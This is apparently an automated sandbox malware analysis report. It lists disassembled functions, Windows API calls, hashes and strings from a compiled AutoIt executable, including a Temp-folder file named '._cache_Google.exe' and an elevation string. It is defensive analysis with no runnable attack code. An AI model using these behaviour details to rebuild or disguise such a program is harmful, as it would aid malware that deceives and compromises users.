                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\._cache_Google.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                      • API String ID: 4253510256-3030172517
                                                                                                                                                                                      • Opcode ID: 8b0e40e413a9be7b85471aa1d5d2511ea27b278e6bdca87b2c69c698671f18df
                                                                                                                                                                                      • Instruction ID: 5c8378686d3564d99f8e3f4df92cd18d75619aafea77b0818b7778c0a7a3375a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b0e40e413a9be7b85471aa1d5d2511ea27b278e6bdca87b2c69c698671f18df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A515971A4C244FFDF10EBA0DC46FAD3B7C9B86718F04809AFA45921E3D6744A44EB66
                                                                                                                                                                                      Function 009630AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1170 9630ad-96315b call 90ca8e call 90d3d2 * 3 call 9084a6 call 963d7b call 963af7 1185 963166-963170 1170->1185 1186 96315d-963161 1170->1186 1188 9631a2 1185->1188 1189 963172-963187 RegConnectRegistryW 1185->1189 1187 9631e6-9631f2 call 94d7e4 1186->1187 1199 963504-963527 call 905cd3 * 3 1187->1199 1190 9631a6-9631c3 RegOpenKeyExW 1188->1190 1192 96319c-9631a0 1189->1192 1193 963189-96319a call 907ba9 1189->1193 1194 9631f7-963227 call 9084a6 RegQueryValueExW 1190->1194 1195 9631c5-9631d7 call 907ba9 1190->1195 1192->1190 1193->1187 1208 96323e-963254 call 907ba9 1194->1208 1209 963229-963239 call 907ba9 1194->1209 1206 9631e3-9631e4 1195->1206 1207 9631d9-9631dd RegCloseKey 1195->1207 1206->1187 1207->1206 1217 9634dc-9634dd 1208->1217 1218 96325a-96325f 1208->1218 1216 9634df-9634e6 call 94d7e4 1209->1216 1224 9634eb-9634fc RegCloseKey 1216->1224 1217->1216 1220 963265-963268 1218->1220 1221 96344c-963498 call 92010a call 9084a6 RegQueryValueExW 1218->1221 1225 96326e-963273 1220->1225 1226 9633d9-963411 call 94ad14 call 9084a6 RegQueryValueExW 1220->1226 1244 9634b4-9634ce call 907ba9 call 94d7e4 1221->1244 1245 96349a-9634a6 1221->1245 1224->1199 1228 9634fe-963502 RegCloseKey 1224->1228 1230 96338d-9633d4 call 9084a6 RegQueryValueExW call 912570 1225->1230 1231 963279-96327c 1225->1231 1226->1224 1252 963417-963447 call 907ba9 call 94d7e4 call 912570 1226->1252 1228->1199 1230->1224 1235 9632de-96332b call 92010a call 9084a6 RegQueryValueExW 1231->1235 1236 96327e-963281 1231->1236 1235->1244 1260 963331-963348 1235->1260 1236->1217 1240 963287-9632d9 call 9084a6 RegQueryValueExW call 912570 1236->1240 1240->1224 1266 9634d3-9634da call 92017e 1244->1266 1251 9634aa-9634b2 call 90ca8e 1245->1251 1251->1266 1252->1224 1260->1251 1265 96334e-963355 1260->1265 1268 963357-963358 1265->1268 1269 96335c-963361 1265->1269 1266->1224 1268->1269 1272 963376-96337b 1269->1272 1273 963363-963367 1269->1273 1272->1251 1278 963381-963388 1272->1278 1276 963371-963374 1273->1276 1277 963369-96336d 1273->1277 1276->1272 1276->1273 1277->1276 1278->1251
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00963AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00962AA6,?,?), ref: 00963B0E
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096317F
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0096321E
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009632B6
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009634F5
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00963502
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1240663315-0
                                                                                                                                                                                      • Opcode ID: bc692ffa04adad5605ee0ae2729969933691d94f0169292672efa8ae9cf80e7c
                                                                                                                                                                                      • Instruction ID: 54fbf851a543259bd9db9aebadbe4a054a0a85077d251be1be6623835a1846b3
                                                                                                                                                                                      • Opcode Fuzzy Hash: bc692ffa04adad5605ee0ae2729969933691d94f0169292672efa8ae9cf80e7c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AE14D75608210AFC715DF28C895E2BBBE9EF89324B04C95DF44ADB2A1DB31ED05CB51
                                                                                                                                                                                      Function 0091E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 0091E4A7
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,0099DC28,?,?), ref: 0091E567
                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,0099DC28,?,?), ref: 0091E5BC
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0091E5C7
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0091E5DA
                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,0099DC28,?,?), ref: 0091E5E4
                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,0099DC28,?,?), ref: 0091E5F0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2717633055-0
                                                                                                                                                                                      • Opcode ID: c2a75e821167fdfa9809105ff0fb74caf96bee33bb6dca03b32a46bc1504f22c
                                                                                                                                                                                      • Instruction ID: af364885d059eaee263fb98c0efa425b065872648267586674af636934a689bf
                                                                                                                                                                                      • Opcode Fuzzy Hash: c2a75e821167fdfa9809105ff0fb74caf96bee33bb6dca03b32a46bc1504f22c
                                                                                                                                                                                      • Instruction Fuzzy Hash: F861D57191A388CFCF16CF6894C01E97F756F6A304F1949D9EC489B247E634C948CB65
                                                                                                                                                                                      Function 009031F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00903202
                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00903219
                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 009757D7
                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 009757EC
                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 009757FF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                      • Opcode ID: c7c764d22ea7a6b9433da713587b96aabc3b2888e56153fc0e69af1c3aae9601
                                                                                                                                                                                      • Instruction ID: e09f5bb3bc9907e3e4f6aec180ef3fdb0ecf0dbc87b4740b2b4543bbf05d478a
                                                                                                                                                                                      • Opcode Fuzzy Hash: c7c764d22ea7a6b9433da713587b96aabc3b2888e56153fc0e69af1c3aae9601
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE113975204701BFEB259B6AEC48F277BBDEBC9B51F208568B42296290DB71DD009B60
                                                                                                                                                                                      Function 00946F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00946F7D
                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00946F8D
                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00946FAC
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00946FD0
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946FE3
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00947022
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1605983538-0
                                                                                                                                                                                      • Opcode ID: 67e5306e42a34005907f2a7bfd1b0622f89b6f69b27e2cb2310eba5bee2d2a26
                                                                                                                                                                                      • Instruction ID: 5cb3eb670149eb8c3197255eab9c2bf4d0a67a08f39937515f4f257210142ed4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67e5306e42a34005907f2a7bfd1b0622f89b6f69b27e2cb2310eba5bee2d2a26
                                                                                                                                                                                      • Instruction Fuzzy Hash: 07216FB1909218ABDB10ABA4DC88FEEB7BCAF49304F1004E9F545E3241E7759F84DB60
                                                                                                                                                                                      Function 0094EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009478AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 009478CB
                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0094F04D
                                                                                                                                                                                      • CoCreateInstance.OLE32(0098DA7C,00000000,00000001,0098D8EC,?), ref: 0094F066
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0094F083
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                                                                                      • Opcode ID: 5aa04829d1cf52fb22dd72b9feb4841a84d718468da485295fa1fd9ff9c753b3
                                                                                                                                                                                      • Instruction ID: 6e6cfd93c60280c10f003fb1626d51201bd53a64cdceea99b00af4819872ddcc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aa04829d1cf52fb22dd72b9feb4841a84d718468da485295fa1fd9ff9c753b3
                                                                                                                                                                                      • Instruction Fuzzy Hash: EAA16875604302AFC710DF14C894E5ABBE9FF88324F158998F89A9B3A1CB31ED45CB91
                                                                                                                                                                                      Function 00912B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00912C63
                                                                                                                                                                                      • _memmove.LIBCMT ref: 0091303A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 1300846289-2766056989
                                                                                                                                                                                      • Opcode ID: 65116f5682f035ad4ec6df360954e5a042103cc373a89ac686f2d777ca009acf
                                                                                                                                                                                      • Instruction ID: 014ba4e6442cc6e511112ee53280698390b3e94a6c80b35567940214eb00f74c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 65116f5682f035ad4ec6df360954e5a042103cc373a89ac686f2d777ca009acf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 59C27B75A04209DFCB14DF98C881AEEB7B5FF48300F248459E81AAB391DB35ED95CB91
                                                                                                                                                                                      Function 0091DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0090C848,0090C848), ref: 0091DDA2
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0090C848,?), ref: 00974A83
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesFindFirst
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4185537391-0
                                                                                                                                                                                      • Opcode ID: f7d0a0bfc627d305b9df0300c9555f8d52c4009cb323086e60e5acddc61fe634
                                                                                                                                                                                      • Instruction ID: bb58180aa284d19a9ba43694081c6d882292931c7e4693e8e47ee07d72ebe7ea
                                                                                                                                                                                      • Opcode Fuzzy Hash: f7d0a0bfc627d305b9df0300c9555f8d52c4009cb323086e60e5acddc61fe634
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9E0D83342E4055746186738EC4D8E9375C9E46338B100B05F835C11E0E774AD5097D6
                                                                                                                                                                                      Function 0090DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3ba83e277062cdcab342c7939edfa29dce72d978ca66aec7475c750c1680b10e
                                                                                                                                                                                      • Instruction ID: eb85af723913883a01ef9df83f673ffb2a8d855f10642900fa22a39c2549863a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ba83e277062cdcab342c7939edfa29dce72d978ca66aec7475c750c1680b10e
                                                                                                                                                                                      • Instruction Fuzzy Hash: DD22BD71A0520ADFDB24DF98C490BAAB7F4FF58300F14C469E94A9B3D1E734A985CB91
                                                                                                                                                                                      Function 00913680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                                      • Opcode ID: 39133aa8d420f50efb4fcc24d6b581d511f85edff30e66caa07cb5749c860f7b
                                                                                                                                                                                      • Instruction ID: 8ac611c7055c896c404cddb0db9e6792fcede2a93b35e493fffb6329c49e8d4c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 39133aa8d420f50efb4fcc24d6b581d511f85edff30e66caa07cb5749c860f7b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 399268716083458FD724DF18C480BAABBF5BF88304F14885DE99A8B3A2D775ED85CB52
                                                                                                                                                                                      Function 0097C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                      • Opcode ID: 0ebe404c6f393681f2cc95497900e22e60958d9d4576c42692ba138400e51900
                                                                                                                                                                                      • Instruction ID: 399d54bbea6bd4a87cf9ffc6cd5000ce0295e0e460fb4f902a50162832881d69
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ebe404c6f393681f2cc95497900e22e60958d9d4576c42692ba138400e51900
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EC04CB240500DDFCB15DF80C945AEFB7BCBB04300F104495A115E1140D7749B459B76
                                                                                                                                                                                      Function 0090E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090E279
                                                                                                                                                                                      • timeGetTime.WINMM ref: 0090E51A
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0090E646
                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0090E651
                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090E664
                                                                                                                                                                                      • LockWindowUpdate.USER32(00000000), ref: 0090E697
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0090E6A3
                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0090E6BD
                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00975B15
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 009762AF
                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 009762BD
                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009762D1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                                      • API String ID: 2641332412-570651680
                                                                                                                                                                                      • Opcode ID: dc35b8bbfdad9a2863312a116c9de5d3bbc0b25b19a29a103fa1c9335e307813
                                                                                                                                                                                      • Instruction ID: aa6381866c9257af2ff8a28d69048260554d8a5b3ea36f32cfd4d1a070f10357
                                                                                                                                                                                      • Opcode Fuzzy Hash: dc35b8bbfdad9a2863312a116c9de5d3bbc0b25b19a29a103fa1c9335e307813
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B62B0716083409FDB24DF24C895BAA77E8BF85304F084D6DF95A8B2E2DBB5D844CB52
